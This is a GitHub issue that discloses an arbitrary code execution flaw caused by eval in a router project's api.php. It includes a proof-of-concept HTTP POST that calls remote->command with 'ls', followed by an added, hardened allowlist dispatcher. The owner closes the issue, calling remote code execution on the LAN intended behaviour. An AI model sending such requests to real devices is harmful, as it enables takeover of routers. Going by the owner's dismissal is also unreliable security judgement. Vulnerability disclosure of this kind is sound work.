Security issue: code execution vulnerability #27

Closed
ly55521 opened this issue Oct 11, 2018 · 1 comment

ly55521 commented Oct 11, 2018

api.php uses the eval function, and several other parameters are controllable, which leads to arbitrary code execution.
$c = new $o();
$o = _GET("class",'unknow');
$f = _GET('function','unknow');
$agrs = implode(',',$_POST);
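As can be seen, $o is an object, $c is an instance of the $o object, $f is a member method of the object, and $agrs is the parameters passed in via POST, i.e. the arguments of the member method.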

poc:

POST /6/api.php?function=command&class=remote HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded

cc='ls'

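Tracing the execution flow, the code below is what actually gets executed, resulting in an arbitrary code execution vulnerability.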
$c = new remote;
$j = $c->command('ls');
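
A hardened form of the dispatch described in the report above, as an added example that is not part of the original issue or the project's code. It replaces eval with an allowlist lookup and passes POST values as data; `Status`, `echoName`, `API_ALLOWLIST` and `dispatch` are hypothetical names, since the page does not show the project's actual eval line.

```php
<?php
declare(strict_types=1);

// Hypothetical handler class standing in for the project's own classes.
final class Status
{
    public function echoName(string $name): string
    {
        return 'hello ' . $name;
    }
}

// Explicit allowlist: class name => methods reachable over HTTP.
// Anything not listed here (for example remote::command) is refused.
const API_ALLOWLIST = [
    'Status' => ['echoName'],
];

/**
 * Dispatch a request without eval(): names are matched against the allowlist
 * and POST values are passed as plain string arguments, never as PHP source.
 */
function dispatch(string $class, string $method, array $post): array
{
    $methods = array_key_exists($class, API_ALLOWLIST) ? API_ALLOWLIST[$class] : [];
    if (!in_array($method, $methods, true)) {
        return ['status' => 403, 'body' => 'class/function not allowed'];
    }
    // Re-index the values so POST keys cannot act as named arguments,
    // and reject nested arrays (e.g. cc[]=x) outright.
    $args = [];
    foreach ($post as $value) {
        if (!is_string($value)) {
            return ['status' => 400, 'body' => 'arguments must be strings'];
        }
        $args[] = $value;
    }
    $expected = (new ReflectionMethod($class, $method))->getNumberOfParameters();
    if (count($args) !== $expected) {
        return ['status' => 400, 'body' => 'wrong number of arguments'];
    }
    $result = call_user_func_array([new $class(), $method], $args);
    return ['status' => 200, 'body' => $result];
}

// Constructed sample requests, mirroring the query string and body in the report.
var_dump(dispatch('Status', 'echoName', ['n' => "'ls'"])); // 200: the quotes stay literal text
var_dump(dispatch('remote', 'command', ['cc' => "'ls'"])); // 403: not on the allowlist
```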

Owner

qoli commented Oct 11, 2018

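This project is designed to run only on a router, protected by the local network.
So by design, executing arbitrary code is allowed here.

Unless your kid maliciously attacks you on your home Wi-Fi.
Of course, attacks resulting from a leaked Wi-Fi password are outside the design scope.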

qoli closed this as completed Oct 11, 2018